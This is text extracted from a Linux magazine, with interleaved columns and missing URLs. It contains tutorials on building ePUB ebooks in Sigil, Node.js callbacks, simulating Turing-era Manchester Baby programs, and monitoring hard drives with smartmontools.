any other ebook format abound. Knowing the inside xml, to the actual ebook. This is all inside the that is a list of all the files used in the eboobk.
of ePUB is also essential if you plan to create or other folder, whose name is OEBPS (Open eBook Each category of content has its own subfolder,
process ebooks with any other program Publication Structure). What the Sigil Book Browser namely Text, Stylesheets, Images, Fonts, Audio,
In extreme synthesis, an ePUB file is nothing but shows, as you can see in Figure 1, is just the part of Video, plus Miscellanea for everything else. The
a compressed Zip archive of all the components the OEBPS structure that Sigil supports. text sources are normal (x)HTML files that you may
of an ebook, which are given standard names and The Table of Contents is at the top of the open in any Web browser. 99
Documentation and support
If you want to use Sigil for anything but really basic real world example of how to use this tool: download the
formatting, you have to begin outside it: read and keep at hand ePUB version and load it in Sigil to see by yourself how its
any of the HTML markup cheatsheets and “CSS for dummies” developers produce ebooks with it.
tutorials you can easily find online. When the Guide isn’t enough, visit the Sigil Forum at
Sigil itself has a great documentation. The official User MobileRead (
Guide is very complete and well structured: more than php?f=203). Among the many threads there, we recommend
35K words, which are mostly tutorials on specific issues. the one titled “Best Pre-Sigil word processor tool/workflow?”,
Besides, since it was written in Sigil, the User Guide is a great and all those that discuss Regular Expressions in Sigil.
You can also tell Sigil to create multiple entries for then click on the Anchor button and give it a proper
the same string and/or hierarchical ones, with the name in the pop-up window. Here, “proper” means
several levels separated by slashes, as in “Free whatever you want, as long as it begins with a letter, is
Software/Linux/Ubuntu”. unique to the whole book (so that if it would remain
To actually create the index once you have finished unique, even if you later moved that text to another file
PRO TIP defining its content, select Tools > Index > Create of the same book) and you use a consistent naming
These days no book, Index. The result will be saved in alphabetical order in a scheme.
digital or in paper, is really
complete and usable new page called index.xhtml, with its own stylesheet To create a link to an already existing anchor (which
if it cannot be easily (sgc-index.css). You can edit it, but any change will be may also be a chapter heading), click on the point
indexed and classified lost the next time Sigil regenerates the index. where it should go and select Insert > Link. You will be
by computers. Never
release an ebook if you At the source code level, indexing a word makes able to select as destination any of the valid targets in
haven’t filled it with good Sigil give it an anchor with a special class (sigil_index_ the current ePUB file, or an external URL.
metadata. It may be marker). That’s important to know, because to stop This procedure is also usable for “reverse linking”,
boring, but it’s vital and
really easy with Sigil. some specific occurrence of that word from that is to let readers return to whatever part of the text
appearing in the index, you must manually remove they were previously reading with one click, even on
those tags from around it. ereaders that lack a built-in “Back” button. You just
To see which snippets of text are currently indexed, have to invert the target and destination points.
switch to Code View or (much better, in our opinion), However, if you really need reverse links for many
give the sigil_index_marker class a different colour in anchors, it may make more sense to add them
the stylesheet. automatically with a script.
Once you’re happy with the structure of your ebook,
Cross-references! you can start worrying about its look, comforted by
Content and structure The last thing you need to make the difference the fact that writing ePUB ebooks is much like writing
come first, but looks between a generic, unhelpful flow of text and a really textual content for the web. To begin with, if you write
are important too. Sigil easy to use one is internal links, for notes and other the text outside Sigil, you should carefully avoid the
supports cover design and cross references. To make any point in the text an bad habits you may have picked up using word
drop caps via standard
anchor, that is, a destination of such links, select it, processors, such as adding blank lines here and there,
CSS stylesheets.
or manually formatting text instead of using styles.
This advice alone could save you lots of time and
frustration when you lay out your book in Sigil.
Speaking of styles, ePub, and consequently Sigil,
use the same CSS stylesheets as web pages. In case
you’ve never met CSS before, here is a real quick copy
of samples of what it can do, and how, in an ebook.
This snippet of CSS code:
padding: 0;
margin: 0;
text-align: justified;
means “justify, with null padding and margins, all the
paragraph elements (that is, all those between pairs of
“<p>” and “</p>” markers in the HTML source). Drop
Caps, while not supported by all ereaders, work in the
same way. Adding code like this to your stylesheet:
span.dropcap {
float: left;
font-size: 4.7em;
line-height: 0.8em;
margin-right: 3pt;
margin-bottom: -0.1em;
will make a drop cap of any letter marked with that
attribute in the Code View of Sigil:
<p><span class=”dropcap”>I</span> am a Drop Cap</p>
To add an existing CSS file to your current book,
select it in File > Add Existing Files. Then, to associate
it to the sources files, right-click on them in the Book
Browser, select “Link Stylesheets” then tick the
stylesheet you want.
CSS stylesheets are also the place to tell your ebook
to use custom fonts. To be usable, the font files must
have first been saved in the corresponding subfolder
of the Sigil Book Browser. If you care about maximum
compatibility with all ereaders the formats to use are
those called OpenType or TrueType, which have the
.otf and .ttf extension. Make sure to choose fonts
whose licence does allow you to use them freely!
Once the fonts are in place, assign them to a CSS
style, and use it in the HTML files:
FlightCrew and the other
@font-face { and height in pixels of the cover image. They are
validation and reporting
font-family: ‘myfont’; called SGC_IMAGE_FILENAME, SGC_IMAGE_WIDTH tools included in Sigil
font-weight: normal; and SGC_IMAGE_HEIGHT. provide a complete view
font-style: normal; of everything that may be
src: url(‘../Fonts/myfont.ttf’); Finally, check the result wrong in your ebook.
} To work as expected, any ePUB file must meet the
minimum quality standards defined in the
Cover and other graphics specification, and be free from internal dead links and
Adding a cover with Sigil is as easy as it gets. Select other common errors. One of the best features of Sigil
Tools > Add Cover, find the image you want to use, is the way that it helps you find these problems.
load it and you’re done. Sigil will take create a cover It doesn’t hurt to run the checks that Sigil provides
source file (cover.xhtml) containing your image, (Tools > Validate) as soon as you import some
marked up to be resizable and usable on most content. This will give you an idea of how much work,
e-readers. Apart from images, if the (dull) default cover and of which kind, may be ahead. Stylesheet
template that Sigil provides bores you, you have two validation for example, and should be done as soon as PRO TIP
possibilities. The quick and dirty solution is to just possible, so you don’t waste time with a layout that Ebooks cluttered with
wrong links or useless
open the cover.xhtml file right there, in Sigil, and may look great in Sigil, but not be portable. elements, be they images,
modify it as you please. If you plan to do more than You can check individual stylesheets by right- stylesheets or unused
one ebook with the same cover style, however, it clicking on them in the Book Browser and selecting cross-references, are
bigger than necessary
would be better to create your own cover template. the Validate option. and harder to read and
To do this, copy the file that Sigil created to the Sigil The F7 key starts the copy of the ePUB validator manage. Find and remove
Preferences Folder, which is $HOME/.local/share/ called FlightCrew ( all that dead weight with
the reports provided by
sigil-ebook/sigil/, then edit it as needed. In doing that, flightcrew), which is distributed with Sigil. The reports Sigil.
you can use the Sigil variables that define the path generated directly by Sigil might be even more useful
(inside the ePUB archive, not on your computer), width than these validators. They are great, for example,
when it comes to spotting images, anchors, CSS
classes and whole stylesheets that are in the ePUB
file, but are never actually used. Sigil can also warn
you if any of the reverse links don’t actually link to
each other.
Sigil is perfect for creating ePUB ebook templates.
Once you have manually crafted one ebook in Sigil
just like you want, reusing its files as bases for other
books with the same style, via shell scripts, will be
easy. But that’s a challenge for another day!
Marco Fioretti is a Free Software and open data campaigner
Sigil can generate a standard Table of Contents that any
who has evangelised FOSS all over the world.
ebook reading software understands. 101
Nobody likes to sit around doing nothing – here’s how your machine
carries on processing while it’s waiting for something to do.
hen people learn to program, they’re often That means the computer waits three times.
WHY DO THIS? taught that it involves listing a series of Depending on what system you’re running on, it could
• Speed up your code by steps that the computer takes one after mean quite a long delay between asking for a name
avoiding unnecessary
waits another until it’s solved the problem. and continuing processing. For most of the time that
• Learn to use one of the Take, for example, the following pseudo code: this program is running the processor will be sitting
trendiest programming print “what is your name” idle, so it’s a waste of resources as well.
platforms (Node.js) name = input(“?”) A better way to run this would be to send all three
• Build your own website print “hello”, name requests for data at the same time, and then process
testing tool to find out
which sites load fastest First it prints out a question, then it calls the the data as it comes back so that whichever data
function input(), which waits for the user to enter their comes back first could be processed first. Doing it this
name, and then returns this as a string. Finally, the way means the computer only has to wait once. This
computer says hello. This approach works fine, and gives us a problem though, because it means that our
we could adjust the program to ask lots of questions program won’t simply run one line after the next. We
about the user to get any information we wanted. need some new way to define the order for the code to
The input is what we call blocking, which means it run in, because you can’t just run all the lines of your
stops the program running until it gets a response program at the same time and hope that it all works.
from the user. Now, let’s look at another program:
print “what is your name” Callbacks
name = input(?) The solution to this problems is to create functions
picture = get_pic_from_server(name) that should run once a specific event occurs – such
biography = get_biography_from_database(name) as when a particular file is returned from a server.
work = get_work_from_file(name) These functions are known as callbacks, and they
Here, it asks for your name, then it gets three pieces allow you to run non-blocking code, yet still define the
of information about you: your picture, your biography order in which you want code to be processed. For
and your work. We haven’t defined the functions that example, take a look at the following pseudo code:
get this data, but we’ll say that they’re also blocking. get_picture_from_server(function_to_run_when_picture_
The process then will be: returned)
1 Get your name When the computer got to this line, it would request
2 Wait for the server to return your picture the picture from the server. However, if the function
Scratch’s “When ...” code
blocks are assigning 3 Wait for the database to return your biography get_picture_from_server is non-blocking, the
callbacks to particular 4 Wait for the filesystem to return your work computer won’t wait for the picture to be returned; it’ll
events. 5 Continue processing just keep processing the main code. Once the server
has processed the request and returned the picture,
the computer will pause processing the main code
and run function_to_run_when_picture_returned (the
callback function). When this function is completed, it
resumes processing the main code. This way the
computer isn’t wasting time while it waits for the
server to respond, because it carries on processing
the main program, yet it can still process the file when
it is returned.
Let’s switch this from pseudo code to real code and
have a look at how it works in practice. Many
languages have the ability to use callbacks, but they
are used extensively in JavaScript. Almost all
JavaScript has callbacks in one form or another,
whether it’s to run code when the user performs a
particular action, or to handle loading data over
unpredictable internet connections. These callbacks
For people who think of JavaScript as a way of for the BeagleBone single-board computers. This
introducing some simple processing power to web may seem a little odd at first, but it enables you to
pages, it may seem a little weird to use it in connect your BeagleBone to your computer via a
server-side programs. Despite that little bit of USB cable. The BeagleBone then runs a web server,
cognitive dissonance, Node.js provides a really which has a HTML-based development
powerful way of building back-end services using a environment that enables you to create Node.js
non-blocking IO, and has dramatically risen in applications on a desktop computer, then run them
popularity over the last few years. It works on the BeagleBoard.
particularly well when acting as the glue that holds Thanks to BoneScript (a Node.js library),
a load of data sources together, and is used to they can interact with the GPIOs on the
power a lot of data-intensive web apps. BeagleBoard. You can then assign callbacks to
This isn’t its only useful application though. It’s things like button presses or getting data from The BeagleBone’s HTML-based IDE makes it
also used as the programming language of choice an I2C connection. easy to get started with GPIO programming.
allow the JavaScript program to remain responsive Our second example will be a really simple website
while waiting for events to happen. We’re going to use speed test. We’ll send requests to four popular
Node.js, which is a server-side JavaScript engine. This websites, and see which ones respond the fastest.
means it’s used to run code on your server rather than var http = require(‘http’);
in a web browser. function wait_end(res, name) {
It’s not usually installed by default, so you’ll need to console.log(‘starting ‘ + name);
grab it from your package manager. On Debian-based res.setEncoding(‘utf8’);
systems, this is done with sudo apt-get install nodejs. res.on(‘data’, function (chunk) {});
You can then run Node files with: res.on(‘end’, function() {
nodejs <filename> console.log(name + ‘ finished’);
We’re not going to dive too deep into how to use });
Node.js because that’s far beyond the scope of this }
article. We’ll have a look at a couple of examples that http.get({host:’’, path:’/’},
both use the http.get method from the http module. function(res) {wait_end(res, ‘bbc’)});
This takes two parameters. The first is a series of http.get({host:’’, path:’/’},
options enclosed between { and }. The second is a function(res) {wait_end(res, ‘stackoverflow’)});
callback function that is run once the request has http.get({host:’’, path:’/’},
been processed. The first example will just dump the function(res) {wait_end(res, ‘ubuntu’)});
HTML content to the terminal: http.get({host:’’, path:’/wiki/Main_Page’},
var http = require(‘http’); function(res) {wait_end(res, ‘wikipedia’)});
var print_html = function(res) { Since http.get is non-blocking, the computer will
res.setEncoding(‘utf8’); execute the four http.get calls one after the other
res.on(‘data’, function (chunk) { without waiting for the servers to respond. When the
console.log(chunk); severs do respond, Node.js will run the callback, which
}); is a function that runs wait_end. This time wait_end is
} the name of the function, not a variable, and it’s called
http.get({host:’’, path:’/’}, print_html); by an anonymous function (the callback). This is
Notice that print_html isn’t a function; it’s a variable because of the extra parameter.
that holds a function. The fact that it’s a variable allows When the server first responds, it prints out a
it to be passed to http.get, and called from there. message saying that it’s starting. Once all the data is
The function in print_html is called from http.get received (and the end event on the response object
once data starts coming from the server. The single happens), it prints out it’s finished. Running this, you
parameter is a HTTP response object, and this has can see how the callbacks allow the computer to
various events on which you can set callbacks. In this process multiple requests at the same time, because
case, we set a callback on the data event that is called the start and end messages are interlinked.
each time a chunk of data is available. This time, we This isn’t a perfect speed test, as the initial HTTP
haven’t stored the function in a variable, but declared it requests won’t be sent at the same time, but it should
in the parameters to the method res.on. give you an idea of how the different servers perform
This example shows how callbacks work, but it (especially when there are only a few of them).
hasn’t really shown the advantages of them. After all, There is a real danger that using callbacks can leave
you could quite easily program the above as a series your code hard to read and difficult to maintain, so
of steps that happen one after the other. In fact, the they should be used with caution. However, when
code would probably be a little clearer if written in the used well, they are a powerful tool to make your
order it executes. programs faster and more flexible. 103
Program the post-war machine used for early computer music,
chess and proto-artificial intelligence.
lan Turing’s work at GCHQ with Colossus
WHY DO THIS? during WWII is well-known, as of course is the
• Take a trip back to the Turing Test, but those were far from his only
involvements with early computing developments. In
• Search for large prime
numbers (very slowly) the late 1940s he was working on designing a
• Use the logic that first stored-program computer (Colossus couldn’t store
inspired the Turing Test programs, and in any case was still very secret), and in
1948 moved to Manchester where the Manchester
Baby and Manchester Mark I were being developed.
The Manchester Baby (aka the Manchester Small
Scale Experimental Machine) wasn’t a full general-
purpose computer, but a small-scale test of Williams
tube memory (cathode ray memory, using the charge
well created by drawing a dot or dash on the tube).
However, it is considered to be the world’s first
stored-program computer, running its first program on
21 June 1948, when it found the highest proper divisor
of 2^18 (262,144), and took 52 minutes to run. Only
two more programs were written for it: an amended One of Turing’s projects while working on the Mark I was
version of this, and a program written by Turing to to write code to investigate the Riemann hypothesis,
carry out long division. which has to do with the distribution of prime numbers.
The Baby was condensed, even primitive: only 32
words of memory and 8 hardware instructions, version, but Turing later wrote an improved version
covering only subtraction and negation (using these, known as the Mersenne Express.
addition can be implemented in software, as -(-x-y) = The Mark I had 40-bit words (longer than the Baby’s
x+y). It had no paper-tape reader, so programs had to 32 bits), and inspired by the success of the Baby, its
be entered painstakingly, a bit at a time, with a main storage was Williams tubes. Initially, it had two
32-switch input device. Williams tubes each capable of holding two ‘pages’ of
32 words (so four ‘pages’, or 128 words, in total),
The Manchester Mark I which was later increased to eight pages. It also had a
Once the Baby was successful, the team (Frederic C magnetic drum as backup storage, which contained
Williams, Tom Kilburn and Geoff Tootill, who had an extra 32 pages (later, 128 pages). Initially, to
designed the Baby, together with research students transfer data from the drum to the Williams tubes, the
DBG Edwards and GE Thomas) started work on the machine had to be stopped and the transfer initiated
Manchester Mark I (also known as the Manchester manually, but in the final version, this could be done as
Automatic Digital Machine, or MADM). The Mark I part of a program.
Panoramic shot of the first ran in April 1949, with a program written to look The drum itself consisted of a series of parallel
Original Baby (copyright for Mersenne primes. Max Newman wrote this magnetic tracks, which each held two pages and had
University of Manchester). its own read/write head, which read and wrote as the
drum revolved. (A little reminiscent of a modern
magnetic hard disk.) Latency depended on the drum
speed, which was synchronised with the main
processor clock.
The most significant aspect of the Mark I, though,
was that it introduced index registers. An index
register holds a memory offset, which is added to an
instruction to create a full memory address.
Effectively, it alters the instruction as the program
goes along. It is useful for very rapidly stepping
through memory addresses, such as to access an
array sequentially, or to handle looping – the index
register allows you to add one (or two or…) to the
memory location to access a new location each time.
Index registers are very commonly used on modern
Turing and code
The Mark I had no assembly language; programmers
had to write their programs in binary form, encoded as
a series of five-bit characters. The programmers’
handbook for the Mark II is available online at the
Turing Archive, which illustrates the instruction
Each program instruction had 20 bits, of which 10
bits held the instruction code and 10 bits the address.
The initial instruction set had 26 instructions (later 30,
when the magnetic drum transfer instructions were
added). Initially, just as with the Baby, instructions had
Williams and Kilburn with
to be keyed in, but the Final version had a teleprinter The switches (labelled 1, 2, 4…) underneath the
the original machine.
with five-hole paper tape reader and punch. Turing typewriter choose the line to be edited, via binary (Copyright University of
created a base-32 encoding scheme, which meant coding. Line 0 is at the top of the screen; set all the Manchester)
that programs and data could be written to and read switches up to access it, then flick switch 1 down for
from the paper tape. This was largely based on the the next line down, switch 1 up and switch 2 down for
existing ITA2 five-bit teleprinter code, which maps the next after that, and so on. This is how you enter a
each of the 32 binary values in a five-bit system to a program, a line at a time, into the store: pick the line
character. One of the characters Turing changed was and set each bit with the typewriter keys.
binary zero (00000), which he wrote as / and which The KLC / KSC / KAC buttons at the bottom clear
was very common in programs, and 01000, which he the current action line, the store, and the accumulator,
wrote as @. Each 40-bit word was therefore respectively. The C, A,
represented as eight five-bit characters, so could be Sc red buttons at the
written (eg) ABC//F@G. Without an assembly bottom let allow you to “The most significant aspect
language, programmers had to produce their
programs in this format, translating binary
look at the control, the
accumulator, or the
of the Mark I was that it
instructions to ITA2, and were encouraged to store, respectively. introduced index registers.”
memorise the ITA2 table. The Mark I, like the Baby, Flicking the CS switch
also wrote its storage right-to-left, rather than to Run will run through all the stored program lines,
left-to-right, so decimal one was 10000 rather than until a Stop instruction is reached. To clear the Stop
00001 as would be expected today. Negative light, hit the KC button. This will also execute a single
numbers were represented with two’s complement line at a time.
(so the value of the most significant bit indicates sign: To get started, try out one of the sample programs
0 for positive and 1 for negative). from the menu. primegen.asc generates primes, and
An early user suggested that the frequently seen stores them in lines 21 and 22. Check out the View >
////// in early programs was an unconscious Disassembler menu to see a translation of the dots on
reflection of Manchester’s wet weather – reminiscent the screen. Note that line 0 is at the top of the screen,
of rain seen through a dirty window. and that numbers are stored least-significant-digit-to-
right, so -.-... on the screen is 5 in decimal. To run the
Simulating the Manchester Baby program, clear everything first, load it into the store
There’s a great Java simulator of the Manchester from the menu, then flick the CS switch to run. Once
Baby available online at the red stop light goes on, you have a prime stored in
It has a photo-realistic GUI so you can press the lines 21 and 22. Hit KC to clear the stop light, then flick
typewriter keys and flick various switches to set CS up and down again to run again until the next stop
Williams tube bits just like the original team. and the next prime.
The red round typewriter keys each set a single bit Next, we’re going to transcribe the first ever
of a particular line. They run top–bottom and left– program into the simulator, and run that. There’s a
right; so the top-left key sets bit 0, and the bottom-right useful online guide to the Baby from the Computer
would adjust bit 39, but only 0–31 are connected. Conservation Society. This includes the structure of
The write/erase switch at bottom-right sets an instruction:
whether the typewriter sets the bit as 1 or 0. (The KSC | Line # | | Function | |
switch at the bottom clears the store.) | 0 1 2 3 4 | 5 .. 12 | 13 14 15 | 16 .. 31 | 105
line with 0s or 1s). Finally there’s a description of what
each instruction does.
An overview of the program stages is below. The
lines in italics are lines from the lab book notes, which
I altered to get the program to run, so leave them out
when typing it in.
Line Instruction Assembly encoding Binary encoding
0 - JMP 0 0..0 Empty line
apparently needed by simulator, not present in notebook
1 -18, C (-18, A) LDN 18 01001 0000 0000
010 0..0 Copy empty line to accumulator to clear it
2 -19, C (-19, A) LDN 19 11001 0000 0000
010 0..0 Load +a into accumulator
3 Sub 20 (a-20, A) SUB 20 00101 0000 0000
001 0..0 Trial subtraction: a - current b
4 Test CMP 00000 0000 0000 011 0..0
is difference negative?
5 Add 21, Cl (c+21, CI) JRP 21 10101 0000 0000
100 0..0 Still positive. Jump back two lines (by adding -3 to
Here’s the Baby simulator
Only the first five bits and bits 13–15 are used at all. the current instruction line)
with first (buggy!) version
of our program loaded up. The line number is the line of the store to which the 6 Sub 22 (a-22, A) SUB 22 01101 0000 0000
function is to be applied. The instruction set looks like 001 0..0 Difference is negative, so we subtracted too many.
this (CI is the Control Instruction, and A is the Add back current b.
accumulator): 7 c, 24 (a,24) STO 24 00011 0000 0000 110 0..0
Function Binary (LSD right) 1948 mnemonic Store remainder
Modern mnemonic Description 8 - LDN 18 01001 0000 0000 010 0..0
0 000 s,C JMP Copy content of Clear accumulator again using empty line. This wasn’t in the
store line s to CI original notes but seems to be needed. (Note: line numbers from
1 100 c+s,C JRP Add content of here do not match notebook.)
store line s to CI 9 -22, C (-22, A) LDN 22 01101 0000 0000
2 010 -s,A LDN Copy content of 010 0..0 Load current b.
store line s, negated, to A 10 Sub 23 (a-23, A) SUB 23 11101 0000 0000
3 110 a,s STO Copy content of A 001 0..0 Create next b = current b - 1.
to store line s 11 c, 20 (a, 20) STO 20 00101 0000 0000
4 001 a-s,A SUB Subtract content 110 0..0 Store next b.
of store line s from A 12 -20, C (-20, A) LDN 20 00101 0000 0000
5 101 As 4. 010 0..0 Load negative next b.
6 011 Test CMP Skip next 13 c, 22 (a-22, A) STO 22 01101 0000 0000
instruction if content of A is negative. 110 0..0 Store negative next b.
7 111 Stop STOP Stop machine and 14 -24, C (-24, A) LDN 24 00011 0000 0000
light Stop bulb. 010 0..0 Load negative of remainder (see line 7).
So, here’s that first program, based on the 15 Test CMP 00000 0000 0000 011 0..0
reconstruction by Geoff Toothill and Tom Kilburn from Is remainder negative? If not, it must be zero.
Toothill’s lab book notes ( 16 - STP 00000 0000 0000 111 0..0
res/res20.htm#e). It finds the highest factor of a given Remainder is zero, so stop. I found this line 16 worked where the
number (a), by starting with b = a - 1, and testing that one below didn’t.
and every smaller number until it succeeds. Early test 16.5 25, Cl (25, C) JMP 25 10011 0000 0000
cases included a = 19, a = 31 (both primes), a = 3141 000 0..0 Original line in notebook which I couldn’t make work;
(final b = 1047), a = 4537 (final b = 349), and the full remainder is zero, so jump to line [16]
trial case of 218. The final b value for that was 2 17, and 17 23, Cl JMP 23 11101 0000 0000 000 0..0
finding it took 52 minutes. Remainder is negative, so jump back to line 1 (number in
In the Instruction column, I’ve shown the notebook location 23). In notebook this was line 2, but that left the
transcription with the 1948 handbook mnemonic in accumulator un-zeroed and caused errors.
brackets. The Assembly encoding is a ‘fake’, in the 17.5 Stop STP 00000 0000 0000 111 0..0
sense that it will work with the simulator but no such Original line 17. This would be line 18 given the line number
thing existed for the original programmers. They had errors, but with the replacement line 16, it’s not needed.
to work with binary, and I’ve given that in the binary 18 init leave blank 0..0 0 (blank)
column (least significant digit to right, as already 19 init NUM -314111011 1011 1001 1..1 -a
mentioned, and 0..0 or 1..1 means fill in the rest of the (value to be tested); here -3141
20 init NUM 3140 00100 0100 0110 0..0 initial
b (a-1); here 3140
21 init NUM -3 10111 1..1 -3
22 init NUM -314000111 1011 1001 1..1
-(initial b); here -3140
23 init NUM 1 10000 0..0 1
24 init leave blank 0..0 0 (blank)
25 init NUM 16 00001 0..0 16 -- in notebook
for use in line 16.5
Negative numbers are stored as two’s complement
(to produce this yourself, write the number out in
binary, swap all the 1s for 0s and 0s for 1s, and add 1).
I’ve added lines 0 and 8, affecting line numbering for
lines 8–17, and have altered lines 16–17.
The program works like so:
Lines 0–2: Clear the accumulator, and load a (the
value whose highest divisor we are trying to find).
Lines 3–5: Subtract b repeatedly until you reach a
negative number.
Close-up of the working replica at the Manchester Museum of Science and Industry.
Lines 6–7: The negative number means we’ve gone
Image CC-BY-SA ,Parrot of Doom.
too far, so add b back again once. This means that the
accumulator now contains whatever is left over (the
remainder) when you divide a by b. Store that button. (In which case I recommend using smaller a
remainder. and b values.) You could also check out Toothill’s
Lines 8–13: Clear the accumulator again and get the article to see how they improved the program over
next b value, by subtracting one from the current b. time and make your own edits.
Store that as both positive and negative values for use
in the next loop. Further developments
Lines 14–17: Load the remainder back again, and test The Manchester Mark I was the basis for the Ferranti
it. If it’s zero, then we’ve found a divisor, and the Mark I, the first commercially available general-
program stops. If not, we loop back to the beginning. purpose electric computer. It just beat out UNIVAC,
Lines 18–25: Data values, both fixed and altered as which was handed to the US Census Bureau on 31
the program runs. March 1951; the first Ferranti Mark I was delivered to
To input this, you can input the binary directly with the University of Manchester in February 1951. The
the switches, to really get a feel for how it was in 1948! oldest recorded computer music was played on a
Alternatively, you can use the Assembly encoding, by Ferranti, using its hoot command, and is available
saving it in a file called babyfactor.asm with line from
numbers, as shown: music.
25 One of the oldest computer games, a chess-playing
0 JMP 0 program, was also written for the Ferranti by Dr Prinz
1 LDN 18 in 1951, although it could handle only mate-in-two
... chess problems, not whole games. Turing had also
Load this from the file menu. The number at the top been experimenting with chess computer programs,
is the number of lines of code in the file and is and wrote a program for a non-existent computer
necessary. Arguably it’s cheating a bit, but bugfixing is between 1948 and 1950. In 1952 he tried to
much easier using assembly! implement it on the Ferranti, but the computer wasn’t
To run it, flick the ‘Run’ switch at the bottom to run sufficiently powerful. Instead, Turing simulated it by
the whole thing until the lightbulb lights (this may take hand, taking around 30 minutes per move. The game
a while for the given value of a). Once the lightbulb was recorded, but the computer lost.
lights, read the b value from line 21 (use the After the Manchester Mark I first ran, neurosurgeon
Disassembler for ease!). The highest divisor is b+1 Sir Geoffrey Jefferson argued in 1949 that no machine
(because b is decremented ready for the next time could ever feel emotion or truly ‘think’. This
before the STOP line is reached). For the value of a undoubtedly had an effect on Turing’s thinking about
given here (3141) this should be 1047. machine intelligence. Turing explicitly disagreed with
Sometimes I found I had to hit the KC switch once Jefferson, arguing that while this might be true now, it
before the Run switch. The simulator is a little was not necessarily true for ever. The debate is, of
temperamental; if you have problems, reload the course, still live today.
simulator and start over.
For debugging or to watch the program working, Juliet Kemp is a programming polyglot, and the author of
O’Reilly’s Linux System Administration Recipes.
you can step through it one line at a time with the KC 107
How to keep on top of your hard drives, so you won’t be in
BEN EVERARD for a nasty surprise when one of them fails.
Don’t get caught out by a failing hard drive.
he most valuable part of your computer is the sudo smartctl --scan
JOHN LANE data stored within. That’s why you take regular sudo smartctl --info /dev/sda
backups and hedge against failures by running If Smart isn’t enabled, the command to enable it is
RAID arrays. Or perhaps you don’t think about the sudo smartctl -s on /dev/sda
worst until after it has happened? Perhaps it would To view a drive’s health self-assessment test result:
help if you could predict when that might be – that sudo smartctl --health /dev/sda
would be smart. It would also be Smart. which will tell you briefly if the drive is about to fail. If
Smart stands for Self-monitoring, Analysis and your drive reports that it is failing then it would be a
Reporting Technology, and is a monitoring system for good idea to think about backing up and replacing it
hard and solid-state drives that detects and reports on as soon as possible.
various indicators of reliability with the aim of You can delve further into the Smart data:
anticipating failures. Smart is built into the drive’s --capabilities shows the Smart features that the drive
firmware, and maintains various attributes that has, and --attributes lists the Smart attributes that the
measure its performance and reliability. drive monitors (this is probably the useful information
The tools that you use to interact with Smart are that you would like to see).
collectively known as Smartmontools, and should be
accessible in your distribution’s package manager; for What’s going on with your drive?
example, in Debian-based systems you’d install it with: The attributes display shows a raw value that’s
apt-get install smartmontools vendor-specific but usually sensible – a temperature’s
It provides two things: a tool called smartctl, which raw value is usually represented by a Celsius value, for
enables you to interact with your Smart drives, and example – but, to remove vendor-specifics, the
Use smartctl --info to smartd, which is a daemon that can be used to firmware normalises them as a value between 1 and
see details of your drive, perform monitoring in the background. 254. The report displays the normalised value in a
including whether Smart To begin, you can scan for Smart drives and column called VALUE and the raw value in one called
is enabled. establish whether they have Smart enabled: RAW VALUE. The third important value is in the
THRESH column, which is a threshold that indicates
failure when the normalised value is less than this
value. The thresholds are chosen so they indicate
imminent failure within 24 hours.
Other columns include WORST, which shows the
closest to failure value that the attribute’s normalised
value has held since Smart was enabled, and TYPE,
which shows a value of either Pre-failure or Old age
and describes whether an attribute indicates
imminent failure or end-of-life due to expected wear
and aging. Don’t be alarmed when you see many
attributes with Pre-fail against them – that alone does
not mean your drive is about to die!
The WHEN_FAILED column is the one that warns
you when things are not good. It will show “failing
now” when the normalised value is less then its
threshold. If it isn’t failing now but has in the past it’ll Smart logs
show “in the past” and the WORST value will be less Smart maintains various logs – here are the one’s you’re
then the threshold. most likely to find useful. Refer to the smartctl man page
for a full list of logs and their uses.
Beware of vendors error Summary SMART error log
xerror Extended Comprehensive SMART error log
Something to be aware of is that none of the
selftest SMART self-test log
attribute’s names and meanings are defined by the xselftest Extended SMART self-test log
standard and, while they are generally used sensibly, To view a log, use the command
vendors can, and sometimes do, use them for sudo smartctl --log=TYPE /dev/sda
differing purposes. If you have a drive that does this where TYPE is one of those listed above.
then you can give the --vendorattribute argument to
to alter how smartctl displays such attributes.
Smart attributes are updated by tests run within the Tests are only useful if they are run and if their
drive’s firmware. The tests don’t affect a disk’s data output is monitored. To help with this, the other part of
and can operate when it is mounted and in use. There smartmontools is the smartd daemon. It monitors
are three kinds of tests. Smart attributes for signs of problems, runs self-tests
Online testing happens transparently when Smart and reports to the system log. It can also use email to
is enabled and it doesn’t impede the drive’s alert administrators of potential problems.
Offline testing can impede performance. It can smartd
either be performed on-demand or automatically at To use smartd, first check its config file, /etc/smartd.
regular intervals. They are suspended during disk conf and then enable it in the appropriate manner for
access and, therefore, have little real impact. your system. For example, if you’re using systemd:
Self-testing only happens on demand. These are sudo systemctl enable smartd
more resource intensive and can impede drive sudo systemctl start smartd
performance while running. The default configuration contains a single entry,
The online and offline tests update the Smart DEVICESCAN, which instructs the daemon to scan for
attributes (the UPDATED column in the attributes Smart devices to monitor. You can perform this scan
listing shows whether they are updated by online or yourself to see what would be monitored in this
offline testing). default scenario
Most drives perform offline testing automatically sudo smartctl --scan
every four hours but you can enable or disable this Should you wish to effect more control, you can
with smartctl --offlineauto. If they are disabled, they replace this default configuration with explicit entries
can still be run on demand: for each device. Any entry can be supplemented with
sudo smartctl --test=offline /dev/sda directives that enable you to control which tests are
Self-tests are different. These are only run on performed and where issues get emailed to. For an
demand and, although they don’t affect the disk’s explanation of these directives, see the man page for
operation, they can be resource intensive. There are smartd.conf or do:
short tests that take a few minutes to complete and smartd -D
longer ones that can take several hours. A third kind of The directive that launches self-tests is one that you
test is the conveyance test that’s designed to detect will probably want to use but it is a little complex. It’s
problems caused when the drive is in transit. The specified as a regular expression of the form T/MM/
results of these tests can be viewed in the Smart logs DD/d/HH to represent a test and the date and time
(see the boxout above). when it should be run. The T character defines the
test type – either S for a short test or L for a long one.
Coding regular expressions is beyond what we can
cover here but, as an example, running a daily short
test at 2AM and a weekly long test on Saturdays at
2AM could be achieved with an expression like this
Here’s an example smartd.conf configuration:
DEVICESCAN -a -s (S/../.././02|L/../../6/02) -m me@example.
Hopefully you’ll never experience a disk failure but,
by spending some time getting to know
smartmontools and configuring a smartd daemon to
monitor your drives, at least you can be forewarned if
The Smart attributes are a measure of the drive’s health. the worst is about to happen. 109
GSmartControl makes checking your hard drives easy…
ometimes a GUI application comes along that
JOHN LANE nicely supplements a command line tool.
GSmartControl is a GUI wrapper around the
command-line smartctl tool that we covered in the
previous pages. It presents its output in a more
accessible form and makes it even easier to interact
with your Smart devices.
Because Smart is part of the drive’s firmware, tests
are run inside the drive – you need to issue one
command to start a test and another to check its
progress or end result. GSmartControl wraps this
process up in a graphical shell around smartctl and
